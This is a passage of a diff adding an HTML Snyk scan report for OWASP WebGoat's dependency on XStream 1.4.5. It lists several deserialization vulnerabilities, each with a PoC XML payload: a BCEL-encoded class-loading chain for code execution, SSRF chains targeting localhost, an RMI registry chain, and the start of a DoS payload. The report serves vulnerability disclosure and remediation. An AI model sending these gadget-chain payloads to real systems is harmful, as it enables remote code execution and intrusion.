+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;type&gt;ysomap&lt;/type&gt;
+    &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+      &lt;m__obj class=&#39;string&#39;&gt;test&lt;/m__obj&gt;
+    &lt;/value&gt;
+  &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+&lt;/sorted-set&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java&#39;s strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer&#39;s control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.16 or highe</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">157</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to execute arbitrary code only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;javafx.collections.ObservableList$1&#39;/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
+        &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+          &lt;contentType&gt;text/plain&lt;/contentType&gt;
+          &lt;is class=&#39;java.io.SequenceInputStream&#39;&gt;
+            &lt;e class=&#39;javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator&#39;&gt;
+              &lt;iterator class=&#39;com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator&#39;&gt;
+                &lt;names class=&#39;java.util.AbstractList$Itr&#39;&gt;
+                  &lt;cursor&gt;0&lt;/cursor&gt;
+                  &lt;lastRet&gt;-1&lt;/lastRet&gt;
+                  &lt;expectedModCount&gt;0&lt;/expectedModCount&gt;
+                  &lt;outer-class class=&#39;java.util.Arrays$ArrayList&#39;&gt;
+                    &lt;a class=&#39;string-array&#39;&gt;
+                      &lt;string&gt;$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeQ$ddN$c20$Y$3d$85$c9$60$O$e5G$fcW$f0J0Qn$bc$c3$Y$T$83$89$c9$oF$M$5e$97$d9$60$c9X$c9$d6$R$5e$cb$h5$5e$f8$A$3e$94$f1$x$g$q$b1MwrN$cf$f9$be$b6$fb$fcz$ff$Ap$8a$aa$83$MJ$O$caX$cb$a2bp$dd$c6$86$8dM$86$cc$99$M$a5$3egH$d7$h$3d$G$ebR$3d$K$86UO$86$e2$s$Z$f5Et$cf$fb$B$v$rO$f9$3c$e8$f1H$g$fe$xZ$faI$c6T$c3kOd$d0bp$daS_$8c$b5Talc$8bxW$r$91$_$ae$a41$e7$8c$e9d$c8$t$dc$85$8d$ac$8dm$X$3b$d8$a5$d2j$y$c2$da1$afQ$D$3f$J$b8V$91$8b$3d$ecS$7d$Ta$u$98P3$e0$e1$a0$d9$e9$P$85$af$Z$ca3I$aa$e6ug$de$93$a1$f8g$bcKB$zG$d4$d6$Z$I$3d$t$95z$c3$fb$e7$a1$83$5bb$w$7c$86$c3$fa$c2nWG2$i$b4$W$D$b7$91$f2E$i$b7p$80$rzQ3$YM$ba$NR$c8$R$bb$md$84$xG$af$60oH$95$d2$_$b0$k$9eII$c11$3a$d2$f4$cd$c2$ow$9e$94eb$eeO$820$3fC$d0$$$fd$BZ$85Y$ae$f8$N$93$85$cf$5c$c7$B$A$A&lt;/string&gt;
+                    &lt;/a&gt;
+                  &lt;/outer-class&gt;
+                &lt;/names&gt;
+                &lt;processorCL class=&#39;com.sun.org.apache.bcel.internal.util.ClassLoader&#39;&gt;
+                  &lt;parent class=&#39;sun.misc.Launcher$ExtClassLoader&#39;&gt;
+                  &lt;/parent&gt;
+                  &lt;package2certs class=&#39;hashtable&#39;/&gt;
+                  &lt;classes defined-in=&#39;java.lang.ClassLoader&#39;/&gt;
+                  &lt;defaultDomain&gt;
+                    &lt;classloader class=&#39;com.sun.org.apache.bcel.internal.util.ClassLoader&#39; reference=&#39;../..&#39;/&gt;
+                    &lt;principals/&gt;
+                    &lt;hasAllPerm&gt;false&lt;/hasAllPerm&gt;
+                    &lt;staticPermissions&gt;false&lt;/staticPermissions&gt;
+                    &lt;key&gt;
+                      &lt;outer-class reference=&#39;../..&#39;/&gt;
+                    &lt;/key&gt;
+                  &lt;/defaultDomain&gt;
+                  &lt;packages/&gt;
+                  &lt;nativeLibraries/&gt;
+                  &lt;assertionLock class=&#39;com.sun.org.apache.bcel.internal.util.ClassLoader&#39; reference=&#39;..&#39;/&gt;
+                  &lt;defaultAssertionStatus&gt;false&lt;/defaultAssertionStatus&gt;
+                  &lt;classes/&gt;
+                  &lt;ignored__packages&gt;
+                    &lt;string&gt;java.&lt;/string&gt;
+                    &lt;string&gt;javax.&lt;/string&gt;
+                    &lt;string&gt;sun.&lt;/string&gt;
+                  &lt;/ignored__packages&gt;
+                  &lt;repository class=&#39;com.sun.org.apache.bcel.internal.util.SyntheticRepository&#39;&gt;
+                    &lt;__path&gt;
+                      &lt;paths/&gt;
+                      &lt;class__path&gt;.&lt;/class__path&gt;
+                    &lt;/__path&gt;
+                    &lt;__loadedClasses/&gt;
+                  &lt;/repository&gt;
+                  &lt;deferTo class=&#39;sun.misc.Launcher$ExtClassLoader&#39; reference=&#39;../parent&#39;/&gt;
+                &lt;/processorCL&gt;
+              &lt;/iterator&gt;
+              &lt;type&gt;KEYS&lt;/type&gt;
+            &lt;/e&gt;
+            &lt;in class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+              &lt;buf&gt;&lt;/buf&gt;
+              &lt;pos&gt;0&lt;/pos&gt;
+              &lt;mark&gt;0&lt;/mark&gt;
+              &lt;count&gt;0&lt;/count&gt;
+            &lt;/in&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference=&#39;../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called des</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">169</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;javafx.collections.ObservableList$1&#39;/&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+      &lt;dataHandler&gt;
+        &lt;dataSource class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource&#39;&gt;
+          &lt;contentType&gt;text/plain&lt;/contentType&gt;
+          &lt;is class=&#39;java.io.SequenceInputStream&#39;&gt;
+            &lt;e class=&#39;javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator&#39;&gt;
+              &lt;iterator class=&#39;com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator&#39;&gt;
+                &lt;configs class=&#39;sun.misc.FIFOQueueEnumerator&#39;&gt;
+                  &lt;queue&gt;
+                    &lt;length&gt;1&lt;/length&gt;
+                    &lt;head&gt;
+                      &lt;obj class=&#39;url&#39;&gt;http://localhost:8080/internal/&lt;/obj&gt;
+                    &lt;/head&gt;
+                    &lt;tail reference=&#39;../head&#39;/&gt;
+                  &lt;/queue&gt;
+                  &lt;cursor reference=&#39;../queue/head&#39;/&gt;
+                &lt;/configs&gt;
+                &lt;returned class=&#39;sorted-set&#39;/&gt;
+              &lt;/iterator&gt;
+              &lt;type&gt;KEYS&lt;/type&gt;
+            &lt;/e&gt;
+            &lt;in class=&#39;java.io.ByteArrayInputStream&#39;&gt;
+              &lt;buf&gt;&lt;/buf&gt;
+              &lt;pos&gt;0&lt;/pos&gt;
+              &lt;mark&gt;0&lt;/mark&gt;
+              &lt;count&gt;0&lt;/count&gt;
+            &lt;/in&gt;
+          &lt;/is&gt;
+          &lt;consumed&gt;false&lt;/consumed&gt;
+        &lt;/dataSource&gt;
+        &lt;transferFlavors/&gt;
+      &lt;/dataHandler&gt;
+      &lt;dataLen&gt;0&lt;/dataLen&gt;
+    &lt;/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&gt;
+    &lt;com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference=&#39;../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data&#39;/&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java&#39;s strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer&#39;s control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.16 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv" target="_blank" rel="noopener noreferrer">GitHub Advisory</a></li><li>[XStream Advisory](https://x-</li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">142</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.</p><h3>PoC</h3><pre><code>&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+      &lt;comparator class=&#39;sun.awt.datatransfer.DataTransferer$IndexOrderComparator&#39;&gt;
+        &lt;indexMap class=&#39;com.sun.xml.internal.ws.client.ResponseContext&#39;&gt;
+          &lt;packet&gt;
+            &lt;message class=&#39;com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart&#39;&gt;
+              &lt;dataSource class=&#39;javax.activation.URLDataSource&#39;&gt;
+                &lt;url&gt;http://localhost:8080/internal/:&lt;/url&gt;
+              &lt;/dataSource&gt;
+            &lt;/message&gt;
+          &lt;/packet&gt;
+        &lt;/indexMap&gt;
+      &lt;/comparator&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+    &lt;string&gt;javax.xml.ws.binding.attachments.inbound&lt;/string&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java&#39;s strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer&#39;s control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).</p><h2>Remediation</h2><p>Upgrade <code>com.thoughtworks.xstream:xstream</code> to version 1.4.16 or higher.</p><h2>References</h2><ul><li><a href="https://x-stream.github.io/CVE-2021-21342.html" target="_blank" rel="noopener noreferrer">XStream Advisory</a></li><li><a href="http://x-stream.github.io/changes.html#1.4.16" target="_blank" rel="noopener noreferrer">XStream Changelog</a></li><li><a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">XStream Workaround</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">641</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Deserialization of Untrusted Data</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Deserialization of Untrusted Data. A remote attacker that has sufficient rights may execute commands of the host by only manipulating the processed input stream.</p><h3>PoC</h3><pre><code>&lt;!-- Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and unmarshal it again with XStream: --&gt;
+
+&lt;java.util.PriorityQueue serialization=&#39;custom&#39;&gt;
+  &lt;unserializable-parents/&gt;
+  &lt;java.util.PriorityQueue&gt;
+    &lt;default&gt;
+      &lt;size&gt;2&lt;/size&gt;
+    &lt;/default&gt;
+    &lt;int&gt;3&lt;/int&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class=&#39;com.sun.org.apache.xpath.internal.objects.XString&#39;&gt;
+        &lt;m__obj class=&#39;string&#39;&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &lt;none&gt;&lt;/m__obj&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+    &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;
+      &lt;type&gt;12345&lt;/type&gt;
+      &lt;value class=&#39;com.sun.xml.internal.ws.api.message.Packet&#39; serialization=&#39;custom&#39;&gt;
+        &lt;message class=&#39;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#39;&gt;
+          &lt;parsedMessage&gt;true&lt;/parsedMessage&gt;
+          &lt;soapVersion&gt;SOAP_11&lt;/soapVersion&gt;
+          &lt;bodyParts/&gt;
+          &lt;sm class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+            &lt;attachmentsInitialized&gt;false&lt;/attachmentsInitialized&gt;
+            &lt;multiPart class=&#39;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#39;&gt;
+              &lt;soapPart/&gt;
+              &lt;mm&gt;
+                &lt;it class=&#39;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#39;&gt;
+                  &lt;aliases class=&#39;com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl&#39;&gt;
+                    &lt;candidates class=&#39;com.sun.jndi.rmi.registry.BindingEnumeration&#39;&gt;
+                      &lt;names&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                        &lt;string&gt;aa&lt;/string&gt;
+                      &lt;/names&gt;
+                      &lt;ctx&gt;
+                        &lt;environment/&gt;
+                        &lt;registry class=&#39;sun.rmi.registry.RegistryImpl_Stub&#39; serialization=&#39;custom&#39;&gt;
+                          &lt;java.rmi.server.RemoteObject&gt;
+                            &lt;string&gt;UnicastRef&lt;/string&gt;
+                            &lt;string&gt;ip2&lt;/string&gt;
+                            &lt;int&gt;1099&lt;/int&gt;
+                            &lt;long&gt;0&lt;/long&gt;
+                            &lt;int&gt;0&lt;/int&gt;
+                            &lt;short&gt;0&lt;/short&gt;
+                            &lt;boolean&gt;false&lt;/boolean&gt;
+                          &lt;/java.rmi.server.RemoteObject&gt;
+                        &lt;/registry&gt;
+                        &lt;host&gt;ip2&lt;/host&gt;
+                        &lt;port&gt;1099&lt;/port&gt;
+                      &lt;/ctx&gt;
+                    &lt;/candidates&gt;
+                  &lt;/aliases&gt;
+                &lt;/it&gt;
+              &lt;/mm&gt;
+            &lt;/multiPart&gt;
+          &lt;/sm&gt;
+        &lt;/message&gt;
+      &lt;/value&gt;
+    &lt;/javax.naming.ldap.Rdn_-RdnEntry&gt;
+  &lt;/java.util.PriorityQueue&gt;
+&lt;/java.util.PriorityQueue&gt;
+</code></pre><p>Users who follow <a href="https://x-stream.github.io/security.html#workaround" target="_blank" rel="noopener noreferrer">the recommendation</a> to setup XStream&#39;s security framework with a whitelist limited to the minimal required types are not affected.</p><h2>Details</h2><p>Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.</p><p>_Deserialization of untrusted data_ (<a href="https://cwe.mitre.org/data/definitions/502.html" target="_blank" rel="noopener noreferrer">CWE-502</a>), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.</p><p>Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a <a href="https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078" target="_blank" rel="noopener noreferrer">popular library (Apache Commons Collection)</a>. These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.</p><p>An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.</p><p>&gt; Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object i</p></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">180</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189</li>
+      <li class="card-meta-item">CWE-502</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> com.thoughtworks.xstream:xstream@1.4.5</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">org.owasp.webgoat:webgoat@2025.4-SNAPSHOT &#x203A; com.thoughtworks.xstream:xstream@1.4.5</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://x-stream.github.io/" target="_blank" rel="noopener noreferrer">com.thoughtworks.xstream:xstream</a> is a simple library to serialize objects to XML and back again.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream&#39;s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.</p><h3>PoC</h3><pre><code>&lt;linked-hash-set&gt;
+  &lt;sun.reflect.annotation.AnnotationInvocationHandler serialization=&#39;custom&#39;&gt;
